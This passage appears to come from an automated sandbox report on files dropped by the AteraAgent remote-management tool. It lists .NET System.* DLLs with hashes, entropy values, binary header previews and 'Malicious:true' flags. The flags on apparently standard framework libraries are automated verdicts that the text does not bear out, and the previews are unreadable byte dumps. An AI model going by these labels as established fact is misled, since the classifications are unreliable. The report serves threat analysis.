                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ..............................I.....@.................................X*..O....@..P...............((...`...... )............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ..P....................(......................................BSJB............v4.0.30319......l...L...#~......l...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0.....%.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.628643370626439
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ANBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9W7eNyb8E9VF6IYijSJIVx3bxe:AvMhF2SzNzwu/NljuQmEpYi60de
                                                                                                                                                                                                                                                                                                                                  MD5:4BFBAE0B0B30D1D206487A654EE40F7A
                                                                                                                                                                                                                                                                                                                                  SHA1:19082DAFE5D2A6241E44CADC76686F546122BDF6
                                                                                                                                                                                                                                                                                                                                  SHA-256:EAC4C1055EC1D52665ACC8B507E58BCEE27BCE5D53E202FAD02D7799C1AD7BE2
                                                                                                                                                                                                                                                                                                                                  SHA-512:3663D9EA1751D3A0352F64B082D24EF43A03461842B87EFE1B546BBB010AD1148511B25D172AA685D44CB24AA7D8AAA5A12469FA88333E6E6D68EF31359449DA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............6... ...@....... ....................................@.................................a6..O....@...............&..((...`.......5............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................6......H........"..H............4......(5........................................o....*"..o....*..o....*"..o....*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*...0..K........-.r1..ps....z. ...@3.(....*. ....3.(....*. ...._,.(....rI..ps..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.899492352944838
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:HZ4RLWdRfRJ0RZWDeNyb8E9VF6IYijSJIVxly3C:HZK0pJuImEpYi60oy
                                                                                                                                                                                                                                                                                                                                  MD5:7A40DD8480E76E77F921F63B79BE1F53
                                                                                                                                                                                                                                                                                                                                  SHA1:0D665F969FA8D61C2572596CE34FA563BF119ABD
                                                                                                                                                                                                                                                                                                                                  SHA-256:56EA652505E6E897E8CB7B48C11CFB5C47ADD5A7A1D459C5417FBAC78B20C9D9
                                                                                                                                                                                                                                                                                                                                  SHA-512:CCF14F3A258E48F20A2B996C82E702008843BBB03D510C7BB2AAAC16DC1FA5BF2B8503C7B8DE3A663AFC6903CD088B63EDDD6F939F84819A9A91E07CA6AC8B31
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@..................((...`......h(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3......................................................m.....A.{.........U.................T...........#.....l...........>.....'...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.793571590954247
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:CFx+WTIEfW5uP6Nyby2sE9jBF6IYiYF85S35IVnxGUHFz9ZIQM/:CYWsmWIyNyb8E9VF6IYijSJIVx39mj/
                                                                                                                                                                                                                                                                                                                                  MD5:D5419A6B93944DC72B02FA5411FC2046
                                                                                                                                                                                                                                                                                                                                  SHA1:13A46E0328E26524F4B51D94D6CF26948D2474E3
                                                                                                                                                                                                                                                                                                                                  SHA-256:BB11643AE808409700FE9969EE6710F4495814A8C345147FC04B3F6C6D6E6849
                                                                                                                                                                                                                                                                                                                                  SHA-512:7692851BBDEE348F0D67AF286FAB919EAED887C937336A77DB1A8B99AF5C469F2234FE3E900D8DFF80C71056BDE4CEAE6CB1AD6DDCAA6A5143E9AA75C8C00947
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............*(... ...@....... ...............................x....@..................................'..O....@..@...............((...`.......&............................................... ............... ..H............text...0.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ...................... &......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................z.....N.....".....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........:.....C.....b...#.k...+.k...3.k...;.....C.....K.....S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):105000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.381779174920515
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Xvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXBA76P:fgk1tiLMYiDFvxqrWDWNoJXBAs
                                                                                                                                                                                                                                                                                                                                  MD5:274A29FFB64260F07AFE5D99C5155585
                                                                                                                                                                                                                                                                                                                                  SHA1:4AFBCAD6451EDA1048C3BA20E6FFC9E90BBE00C3
                                                                                                                                                                                                                                                                                                                                  SHA-256:82B2665B895F45D0C9B3B96AE08E14764DB8297FB2A8D5B70598C19A39F74BC6
                                                                                                                                                                                                                                                                                                                                  SHA-512:FD60D9E29E0B493B45564773D56A1848E7BBEC458A9EA2B79C9DAB7B88FF4524C0F3DC1BC0E8A15F27AC9EDFB9491E2950733941D79AD2B20B858B88D6EFF1A8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..d...........W... ........... ....................................@.................................5W..O....................r..((...........V............................................... ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc...............p..............@..B................iW......H........................9.......V......................................j~....%-.&(I...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r7..p.(....*2rs..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r=..p.(....*2r_..p.(....*2r...p.(....*2r...p.(....*2r...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853320168044028
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:qKcuz1W1cWliNyb8E9VF6IYijSJIVxLn8RE:2u8niEpYi60bP
                                                                                                                                                                                                                                                                                                                                  MD5:B9FDE21F01A11F1B8C2FCDB8BC7B59B1
                                                                                                                                                                                                                                                                                                                                  SHA1:C3C0F84B82098D0FED4ECCE3F91654F9F985166F
                                                                                                                                                                                                                                                                                                                                  SHA-256:B2AFFA1A4212CFBD6612D310079FE241EF082D4386744F45978C959C02C4C63A
                                                                                                                                                                                                                                                                                                                                  SHA-512:3A5B7B8FC209FE490971B6A91FFC1D0F67ACFF8E76E8723236885B0E606C4F80317DF85D39492AF2669042243295A220BD34C8C995F3DF00A1146B9F9D6EFD8B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................!.....@..................................(..O....@..P...............((...`......H'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..x....................&......................................BSJB............v4.0.30319......l.......#~......H...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................................p.....D.....9.....X.................W...........&.....o...........A.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.860268507366871
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:K+SWikW0uNyb8E9VF6IYijSJIVxAd58Nd:K+eGWEpYi60CY
                                                                                                                                                                                                                                                                                                                                  MD5:54ECC777251536A3FD1C6E192210EDBF
                                                                                                                                                                                                                                                                                                                                  SHA1:DF1650BF5C3BA0633657AB7A8F1F29D62CF52852
                                                                                                                                                                                                                                                                                                                                  SHA-256:DFFDF486DB3E0C31D54DC41045D7760FC6DBA8775BDC3A167ACA7EE481D029C4
                                                                                                                                                                                                                                                                                                                                  SHA-512:323BF8BD3505FB09CCEA49BE3815B566ED652BEE568DB39CD4B56BDD3DE41303537BAB6EFA34AE9146C2AAD1996AC286DF91E1F883268BAF16E4E732A0193E47
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................I.....@..................................(..O....@..P...............((...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....h.......#US.l.......#GUID...|.......#Blob......................3......................................................y.....M...........a.................`.........../.....x...........J.....3...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.907185587915265
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:0AWzgWSsNyb8E9VF6IYijSJIVxXUxwJUs:0tAsEpYi60jr
                                                                                                                                                                                                                                                                                                                                  MD5:FDE6AFE5B60A2796ED16C86A34D0BFB2
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAA2E66E7711159ED4E49FBAD637CF9D58128EF
                                                                                                                                                                                                                                                                                                                                  SHA-256:2965A988947A2A9D239C2415DB08A3AED4B2E88BE05520EE7865B0D6BAF5FF92
                                                                                                                                                                                                                                                                                                                                  SHA-512:E60F71C45661D73C49F0527466F9E88142A0D8B2BFE0DC3FD568C1FD3D8C49ED18AA9186E5C50D093E1EE46B19655EBC34E38938EF9115254B64661E7D02BE7A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...............................-....@.................................p)..O....@..@...............((...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................C...f.C...:.0...c.....N.................M.................e...........7..... ...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.864664035747848
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:aBLRWbYWziZNyb8E9VF6IYijSJIVx7cZXD:aB2xi9EpYi60YR
                                                                                                                                                                                                                                                                                                                                  MD5:5DA2F0E5E2EA11CD35F1B7DD5FED9027
                                                                                                                                                                                                                                                                                                                                  SHA1:8A3E5E5C91FDB2A7CAEF6A99FA9C563C1160635D
                                                                                                                                                                                                                                                                                                                                  SHA-256:72B62A9B0D816AAE2DB864D357E160E53108FE8AEC57E447E2F645958125F89E
                                                                                                                                                                                                                                                                                                                                  SHA-512:CAE8771A752794A28A16E8666AEAF4609B2204DF3F78E9E5D5FE1CFEEDEB82BBCF6AD08F7CA543708DFD88E5E5EA2CF3021690D18B55903887957A4D30A27204
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............b)... ...@....... ....................................@..................................)..O....@..................((...`.......'............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US.........#GUID...........#Blob......................3................................................../...z./...N.....O.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853684662190347
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:mZxcMRW4/W5TPPNyby2sE9jBF6IYiYF85S35IVnxGUHFyF5yLEaZP:mHW4/W1HNyb8E9VF6IYijSJIVx+wEQ
                                                                                                                                                                                                                                                                                                                                  MD5:B1CD6E53576B7CBFB0FD6AF7F7990AFC
                                                                                                                                                                                                                                                                                                                                  SHA1:A10AAF2819885F543DB3E364022C0EDAF8CCBEF0
                                                                                                                                                                                                                                                                                                                                  SHA-256:78C5460052BEA55F5388D5DC702923CC545834F67D556446A66548E1E12BF41D
                                                                                                                                                                                                                                                                                                                                  SHA-512:980C08FD2AA3B05D6A6C843898998D0CADB0164C4799D666ED788BD8A24E222DFABC3CFF683360B2E3B5E48202DE0099D81A10ED9420B07E222AEF3780AFE933
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ...............((...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......\...#Strings....`.......#US.d.......#GUID...t.......#Blob......................3..................................................+.....+...^.....K.....r.................q.....'.....@.................[.....D...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.9104870581606725
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:xvk7hWmCWKpNyb8E9VF6IYijSJIVxu2Si:xs7/GtEpYi606i
                                                                                                                                                                                                                                                                                                                                  MD5:EB957A4917DCADEC7BB7802748A352A4
                                                                                                                                                                                                                                                                                                                                  SHA1:DB19F6F1963A823CEC71AA8C60A2238431B7CC33
                                                                                                                                                                                                                                                                                                                                  SHA-256:15AB87C1CA71F431388811EDEF5608B8E815AA5B21320649DF4CEF1C8989EA13
                                                                                                                                                                                                                                                                                                                                  SHA-512:31188C40E68CF39145E99217FD779B961B3A8A0F9E0521D6F07ACF198DA67AC343AAF0559DC314A427FA985ACEBC937F36F37725F244897E1CF4A3AC0F4A5BBD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................U.....@.................................h)..O....@..0...............((...`......0(............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................)......H.......P ..`....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....8.......#US.<.......#GUID...L.......#Blob......................3................................................ .C.....C...w.0...c.............................@.....Y.................t.....]...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8756451362359
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:vGMWCUWiBNyb8E9VF6IYijSJIVxRohsUhGS:v38FEpYi60hUhr
                                                                                                                                                                                                                                                                                                                                  MD5:67133600C6AD317ED59A36BEA90D3B56
                                                                                                                                                                                                                                                                                                                                  SHA1:4125A69321DE7BF1DD32ABEC264DD5D4ABC81A34
                                                                                                                                                                                                                                                                                                                                  SHA-256:5686375D5B14B5D0344A76C0A31D1EBF3FE8BB698C5DFDCED51891A7917C6319
                                                                                                                                                                                                                                                                                                                                  SHA-512:AEB0E6D02F39E86D153003218205648C5C79E98A76E3991B07C622727491F228E2BC0C21CB0D847CE2F373278370B5086778096451B32C4DFD2759BDAD9161F8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@.................................@)..O....@..................((...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................t)......H.......P ..8....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US. .......#GUID...0.......#Blob......................3..................................................].....]...T.J...}.....h.$.....$.....$...g.$.....$...6.$.....$.....$...Q.....:.$.................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853171439384106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KBhwI7WSQWEQNyb8E9VF6IYijSJIVxCtgHN:KDwIBSoEpYi60j
                                                                                                                                                                                                                                                                                                                                  MD5:AC6C7DED172F6CD19BFED88A099A067E
                                                                                                                                                                                                                                                                                                                                  SHA1:6D8BDCC64A288AD00CD7CCAFE40163BE37F0681E
                                                                                                                                                                                                                                                                                                                                  SHA-256:8A4A18372EEA55F5052FBED8C1E1DE567F0AEB6B9DB8AFC93FFB0BCB13C9BFC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:987E08DD6EAD5AD86EFE9401760C48D2E67F6CDCE51B9AF4620C037D8BE316FAFE37D5946860B4857D76B314485B6746515CCB86F28B29CFFD9F163DE31CD706
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................b.....@.................................l(..O....@..P...............((...`......4'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..d....................&......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................f.....:.....2.....N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.871202758504248
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:kyvPRW4lWvKNyb8E9VF6IYijSJIVxnKJtImVm:l39oKEpYi60Q9Y
                                                                                                                                                                                                                                                                                                                                  MD5:B3C22FAC5F3D4802F24B6232AA7747AD
                                                                                                                                                                                                                                                                                                                                  SHA1:C106E0167117D69811C2648344F867FD68012A43
                                                                                                                                                                                                                                                                                                                                  SHA-256:724D73988F3AB54953D20211DA25C7DEF123D563C5F911CD8B0DCA5EF879B8C6
                                                                                                                                                                                                                                                                                                                                  SHA-512:8356F9B44454218ED410A42064932FED750423289B0AF079B54F79DA6881D4A2C71B716F79D12A3B96F4BB03A054419260932466BF7D00081404F05D63A28FDC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...................................@..................................)..O....@..................((...`......l(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................f.....:...........N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.&...K.F...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
